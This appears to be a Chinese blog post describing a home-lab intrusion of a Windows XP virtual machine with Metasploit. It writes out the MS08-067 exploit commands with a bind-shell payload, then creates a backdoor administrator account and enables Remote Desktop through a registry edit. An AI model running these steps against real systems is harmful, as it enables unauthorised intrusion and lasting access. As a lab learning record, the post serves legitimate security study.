【MSF笔记】入侵XP系统——MSF初体验
2015-10-08 17:54
302 查看
【MSF笔记】入侵XP系统——MSF初体验
最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333….),下面记录一下初步使用Metasploit的过程。首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。
Metasploit 是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具 来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种
攻击工具,并将它们贡献给所有Metasploit用户。
Metasploit的设计初衷是打造成一个攻击工具开发平台,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
说再多也不如真情实弹的干不是。
我用VMware搭建了一个实验环境,下面是网络的拓扑图:
![](http://izilong.net/wp-content/uploads/2015/04/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91-1024x391.png)
要做的就是用Kali Linux里的Metasploit入侵WinXP,然后从物理机,也就是Win7的远程桌面连进WinXP 系统。
首先,在Kali用命令 msfconsole 开启Metasploit。
![](http://izilong.net/wp-content/uploads/2015/04/12.jpg)
然后运行如下命令:
use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
set LHOST 192.168.116.3 #设置本地主机IP
set RHOST 192.168.116.116 #设置目标主机IP
set payload windows/shell_bind_tcp #设置payload
show options #查看设置信息
exploit #实施攻击
由图可知,攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。
![](http://izilong.net/wp-content/uploads/2015/04/32.jpg)
添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。
接下来执行命令 netstat -an 看一下目标主机开放端口的情况。
![](http://izilong.net/wp-content/uploads/2015/04/41.jpg)
发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
![](http://izilong.net/wp-content/uploads/2015/04/51.jpg)
然后,我们在物理机(Win7)运行 mstsc进行远程桌面连接。
![](http://izilong.net/wp-content/uploads/2015/04/61.jpg)
OK,成功入侵目标主机。
Metasploit 就是一款这么强大的工具,使渗透测试人员如虎添翼,几个命令就入侵了目标主机。它的强大功能不言而喻。
接下来,我会继续研究Metasploit的使用,并记录自己的学习过程,希望能给各位一定的帮助。
相关文章推荐
- 把Chrome OS安装在VMWare下及Chrome OS的关键特性和一些截图
- 企业云 2.0:VMware 眼中的企业 IT 的未来
- 黑客最起码要懂基本问题
- 黑客基本术语
- 如何成为一名黑客
- BBSXP漏洞再探究
- Dedecms getip()的漏洞利用代码
- 插件管理框架 for Delphi(一)
- 漏洞漫舞的飞骋
- OBlog任意文件下载漏洞
- IIS漏洞整理大全
- JSP脚本漏洞面面观
- PJBlog存在SQL注入漏洞大家要快下补丁了
- 新思路现动网新漏洞
- 小议yxbbs漏洞利用代码
- 揭露88red生成htm静态页面企业建站系统漏洞第1/2页
- 四大漏洞入侵博客
- Debian灾难性漏洞
- VMware Workstation 5.5.3 Build 34685 汉化补丁